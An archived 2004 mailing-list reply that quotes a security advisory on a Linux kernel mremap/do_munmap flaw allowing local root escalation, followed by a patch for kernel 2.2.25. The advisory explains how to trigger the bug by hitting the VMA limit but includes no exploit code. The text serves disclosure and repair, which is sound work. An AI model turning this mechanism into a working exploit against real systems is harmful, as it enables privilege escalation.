<<< Date Index >>>     <<< Thread Index >>>

Re: Second critical mremap() bug found in all Linux kernels



On Wed, 18 Feb 2004, Paul Starzetz wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
> 
> Synopsis:  Linux kernel do_mremap VMA limit local privilege escalation
>            vulnerability
> Product:   Linux kernel
> Version:   2.2 up to 2.2.25, 2.4 up to 2.4.24, 2.6 up to 2.6.2
> Vendor:    http://www.kernel.org/
> URL:       http://isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt
> CVE:       CAN-2004-0077
> Author:    Paul Starzetz <ihaquer@xxxxxxx>
> Date:      February 18, 2004
> 
> 
> Issue:
> ======
> 
> A critical security vulnerability has been found in the Linux kernel 
> memory management code inside the mremap(2) system call due to missing 
> function return value check. This bug is completely unrelated to the 
> mremap bug disclosed on 05-01-2004 except concerning the same internal 
> kernel function code.
> 
> 
> Details:
> ========
> 
> The Linux kernel manages a list of user addressable valid memory 
> locations on a per process basis. Every process owns a single linked 
> list of so called virtual memory area descriptors (called from now on 
> just VMAs). Every VMA describes the start of a valid memory region, its 
> length and moreover various memory flags like page protection. 
> 
> Every VMA in the list corresponds to a part of the process's page table. 
> The page table contains descriptors (in short page table entries PTEs) 
> of physical memory pages seen by the process. The VMA descriptor can be 
> thus understood as a high level description of a particular region of 
> the process's page table storing PTE properties like page R/W flag and 
> so on.
> 
> The mremap() system call provides resizing (shrinking or growing) as 
> well as moving of existing virtual memory areas or any of its parts 
> across process's addressable space.
> 
> Moving a part of the virtual memory from inside a VMA area to a new 
> location requires creation of a new VMA descriptor as well as copying 
> the underlying page table entries described by the VMA from the old to 
> the new location in the process's page table.
> 
> To accomplish this task the do_mremap code calls the do_munmap() 
> internal kernel function to remove any potentially existing old memory 
> mapping in the new location as well as to remove the old virtual memory 
> mapping. Unfortunately the code doesn't test the return value of the 
> do_munmap() function which may fail if the maximum number of available 
> VMA descriptors has been exceeded. This happens if one tries to unmap 
> middle part of an existing memory mapping and the process's limit on the 
> number of VMAs has been reached (which is currently 65535).
> 
> One of the possible situations can be illustrated with the following 
> picture. The corresponding page table entries (PTEs) have been marked 
> with o and x:
> 
> Before mremap():
> 
> (oooooooooooooooooooooooo)     (xxxxxxxxxxxx)
> [----------VMA1----------]     [----VMA2----]
>       [REMAPPED-VMA] <---------------|
> 
> 
> After mremap() without VMA limit:
> 
> (oooo)(xxxxxxxxxxxx)(oooo)
> [VMA3][REMAPPED-VMA][VMA4]
> 
> 
> After mremap() but VMA limit:
> 
> (ooooxxxxxxxxxxxxxxoooo)
> [---------VMA1---------]
>      [REMAPPED-VMA]
> 
> 
> After the maximum number of VMAs in the process's VMA list has been 
> reached do_munmap() will refuse to create the necessary VMA hole because 
> it would split the original VMA in two disjoint VMA areas exceeding the 
> VMA descriptor limit.
> 
> Due to the missing return value check after trying to unmap the middle 
> of the VMA1 (this is the first invocation of do_munmap inside do_mremap 
> code) the corresponding page table entries from VMA2 are still inserted 
> into the page table location described by VMA1 thus being subject to 
> VMA1 page protection flags. It must be also mentioned that the original 
> PTEs in the VMA1 are lost thus leaving the corresponding page frames 
> unusable for ever.
> 
> The kernel also tries to insert the overlapping VMA area into the VMA 
> descriptor list but this fails due to further checks in the low level 
> VMA manipulation code. The low level VMA list check in the 2.4 and 2.6 
> kernel versions just call BUG() therefore terminating the malicious 
> process.
> 
> There are also two other unchecked calls to do_munmap() inside the 
> do_mremap() code and we believe that the second occurrence of unchecked 
> do_munmap is also exploitable. The second occurrence takes place if the 
> VMA to be remapped is beeing truncated in place. Note that do_munmap can 
> also fail on an exceptional low memory condition while trying to 
> allocate a VMA descriptor.
> 
> We were able to create a robust proof-of-concept exploit code giving 
> full super-user privileges on all vulnerable kernel versions. The 
> exploit code will be released next week.
> 
> 
> Impact:
> =======
> 
> Since no special privileges are required to use the mremap(2) system 
> call any process may use its unexpected behavior to disrupt the kernel 
> memory management subsystem.
> 
> Proper exploitation of this vulnerability leads to local privilege 
> escalation giving an attacker full super-user privileges. The 
> vulnerability may also lead to a denial-of-service attack on the 
> available system memory.
> 
> Tested and known to be vulnerable kernel versions are all <= 2.2.25, <= 
> 2.4.24 and <= 2.6.1. The 2.2.25 version of Linux kernel does not 
> recognize the MREMAP_FIXED flag but this does not prevent the bug from 
> being successfully exploited. All users are encouraged to patch all 
> vulnerable systems as soon as appropriate vendor patches are released. 
> There is no hotfix for this vulnerablity. Limited per user virtual 
> memory still permits do_munmap() to fail.
> 
> 
> Credits:
> ========
> 
> Paul Starzetz <ihaquer@xxxxxxx> has identified the vulnerability and 
> performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF 
> INFORMATION PRESENTED HERE IS ALLOWED ONLY WITH EXPRESS PERMISSION OF 
> ONE OF THE AUTHORS.
> 
> 
> Disclaimer:
> ===========
> 
> This document and all the information it contains are provided "as is", 
> for educational purposes only, without warranty of any kind, whether 
> express or implied.
> 
> The authors reserve the right not to be responsible for the topicality, 
> correctness, completeness or quality of the information  provided in 
> this document. Liability claims regarding damage caused by the use of 
> any information provided, including any kind of information which is 
> incomplete or incorrect, will therefore be rejected.
> 
> - -- 
> Paul Starzetz
> iSEC Security Research
> http://isec.pl/
> 
> -----BEGIN PGP SIGNATURE-----
> Version: GnuPG v1.0.7 (GNU/Linux)
> 
> iD8DBQFAM1QzC+8U3Z5wpu4RAqXzAKCMOkFu1mXzzRgLyuFYp4ORpQCQDgCfe4M2
> 3IjbGvzniOjv/Hc7KKAzMtU=
> =GJds
> -----END PGP SIGNATURE-----
> 
> 
Attached patch fixes this bug for kernel 2.2.25. It should also apply cleanly 
to 
kernels since at least 2.2.21.
-- 

    Sincerely Your, Dan.
--- linux/mm/mremap.c.security  Sun Mar 25 20:31:03 2001
+++ linux/mm/mremap.c   Thu Feb 19 05:10:34 2004
@@ -9,6 +9,7 @@
 #include <linux/shm.h>
 #include <linux/mman.h>
 #include <linux/swap.h>
+#include <linux/file.h>
 
 #include <asm/uaccess.h>
 #include <asm/pgtable.h>
@@ -25,7 +26,7 @@
        if (pgd_none(*pgd))
                goto end;
        if (pgd_bad(*pgd)) {
-               printk("move_one_page: bad source pgd (%08lx)\n", 
pgd_val(*pgd));
+               printk("copy_one_page: bad source pgd (%08lx)\n", 
pgd_val(*pgd));
                pgd_clear(pgd);
                goto end;
        }
@@ -34,7 +35,7 @@
        if (pmd_none(*pmd))
                goto end;
        if (pmd_bad(*pmd)) {
-               printk("move_one_page: bad source pmd (%08lx)\n", 
pmd_val(*pmd));
+               printk("copy_one_page: bad source pmd (%08lx)\n", 
pmd_val(*pmd));
                pmd_clear(pmd);
                goto end;
        }
@@ -57,34 +58,22 @@
        return pte;
 }
 
-static inline int copy_one_pte(pte_t * src, pte_t * dst)
+static int copy_one_page(struct mm_struct *mm, unsigned long old_addr, 
unsigned long new_addr)
 {
-       int error = 0;
-       pte_t pte = *src;
+       pte_t * src, * dst;
 
-       if (!pte_none(pte)) {
-               error++;
-               if (dst) {
-                       pte_clear(src);
-                       set_pte(dst, pte);
-                       error--;
+       src = get_one_pte(mm, old_addr);
+       if (src && !pte_none(*src)) {
+               if ((dst = alloc_one_pte(mm, new_addr))) {
+                       set_pte(dst, *src);
+                       return 0;
                }
+               return 1;
        }
-       return error;
-}
-
-static int move_one_page(struct mm_struct *mm, unsigned long old_addr, 
unsigned long new_addr)
-{
-       int error = 0;
-       pte_t * src;
-
-       src = get_one_pte(mm, old_addr);
-       if (src)
-               error = copy_one_pte(src, alloc_one_pte(mm, new_addr));
-       return error;
+       return 0;
 }
 
-static int move_page_tables(struct mm_struct * mm,
+static int copy_page_tables(struct mm_struct * mm,
        unsigned long new_addr, unsigned long old_addr, unsigned long len)
 {
        unsigned long offset = len;
@@ -99,7 +88,7 @@
         */
        while (offset) {
                offset -= PAGE_SIZE;
-               if (move_one_page(mm, old_addr + offset, new_addr + offset))
+               if (copy_one_page(mm, old_addr + offset, new_addr + offset))
                        goto oops_we_failed;
        }
        return 0;
@@ -113,8 +102,6 @@
         */
 oops_we_failed:
        flush_cache_range(mm, new_addr, new_addr + len);
-       while ((offset += PAGE_SIZE) < len)
-               move_one_page(mm, new_addr + offset, old_addr + offset);
        zap_page_range(mm, new_addr, len);
        flush_tlb_range(mm, new_addr, new_addr + len);
        return -1;
@@ -129,7 +116,9 @@
        if (new_vma) {
                unsigned long new_addr = get_unmapped_area(addr, new_len);
 
-               if (new_addr && !move_page_tables(current->mm, new_addr, addr, 
old_len)) {
+               if (new_addr && !copy_page_tables(current->mm, new_addr, addr, 
old_len)) {
+                       unsigned long ret;
+
                        *new_vma = *vma;
                        new_vma->vm_start = new_addr;
                        new_vma->vm_end = new_addr+new_len;
@@ -138,9 +127,19 @@
                                new_vma->vm_file->f_count++;
                        if (new_vma->vm_ops && new_vma->vm_ops->open)
                                new_vma->vm_ops->open(new_vma);
+                       if ((ret = do_munmap(addr, old_len))) {
+                               if (new_vma->vm_ops && new_vma->vm_ops->close)
+                                       new_vma->vm_ops->close(new_vma);
+                               if (new_vma->vm_file)
+                                       fput(new_vma->vm_file);
+                               flush_cache_range(current->mm, new_addr, 
new_addr + old_len);
+                               zap_page_range(current->mm, new_addr, old_len);
+                               flush_tlb_range(current->mm, new_addr, new_addr 
+ old_len);
+                               kmem_cache_free(vm_area_cachep, new_vma);
+                               return ret;
+                       }
                        insert_vm_struct(current->mm, new_vma);
                        merge_segments(current->mm, new_vma->vm_start, 
new_vma->vm_end);
-                       do_munmap(addr, old_len);
                        current->mm->total_vm += new_len >> PAGE_SHIFT;
                        if (new_vma->vm_flags & VM_LOCKED) {
                                current->mm->locked_vm += new_len >> PAGE_SHIFT;
@@ -176,9 +175,9 @@
         * Always allow a shrinking remap: that just unmaps
         * the unnecessary pages..
         */
-       ret = addr;
        if (old_len >= new_len) {
-               do_munmap(addr+new_len, old_len - new_len);
+               if (!(ret = do_munmap(addr+new_len, old_len - new_len)))
+                       ret = addr;
                goto out;
        }